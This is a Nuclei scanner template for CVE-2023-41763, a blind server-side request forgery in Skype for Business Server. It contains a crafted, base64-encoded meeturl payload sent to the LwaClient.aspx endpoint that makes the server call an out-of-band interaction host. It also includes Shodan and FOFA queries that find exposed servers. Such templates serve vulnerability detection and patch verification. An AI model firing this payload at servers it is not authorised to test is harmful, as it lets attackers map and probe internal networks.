id: CVE-2023-41763 info: name: Skype for Business 2019 (SfB) - Blind Server-side Request Forgery author: hateshape severity: medium description: | Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability impact: | Unauthenticated attackers can exploit blind SSRF vulnerabilities through the meeturl parameter to make the Skype for Business server probe internal network resources, potentially discovering internal services and infrastructure topology. remediation: | Apply Microsoft security patches for Skype for Business Server 2015 and 2019 that validate and restrict URL parameters in the LwaClient.aspx endpoint. reference: - https://frycos.github.io/vulns4free/2022/09/26/skype-audit-part2.html - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-41763 - https://nvd.nist.gov/vuln/detail/CVE-2023-41763 - https://github.com/Ostorlab/KEV - https://github.com/Ostorlab/known_exploited_vulnerbilities_detectors classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-score: 5.3 cve-id: CVE-2023-41763 epss-score: 0.16495 epss-percentile: 0.95067 cpe: cpe:2.3:a:microsoft:skype_for_business_server:2015:cumulative_update_13:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: microsoft product: skype_for_business_server shodan-query: - html:"Skype for Business" - http.html:"skype for business" fofa-query: body="skype for business" tags: cve,cve2023,skype,blind-ssrf,oast,ssrf,kev,microsoft,vkev,vuln variables: ssrfpayload: "http://{{interactsh-url}}/?id={{rand_base(3)}}%25{1337*1337}#.xx//" http: - raw: - | GET /lwa/Webpages/LwaClient.aspx?meeturl={{base64(ssrfpayload)}} HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: body words: - 'Skype' # digest: 4a0a0047304502207db96f2720bfc406ab62b6945c56d016d0480ca9c4b7372a6de3d10e4538a4a2022100ec945657723d5d70b97f4d5c875aba1cfe32c5b3b4306407171787e4329db374:922c64590222798bb761d5b6d8e72950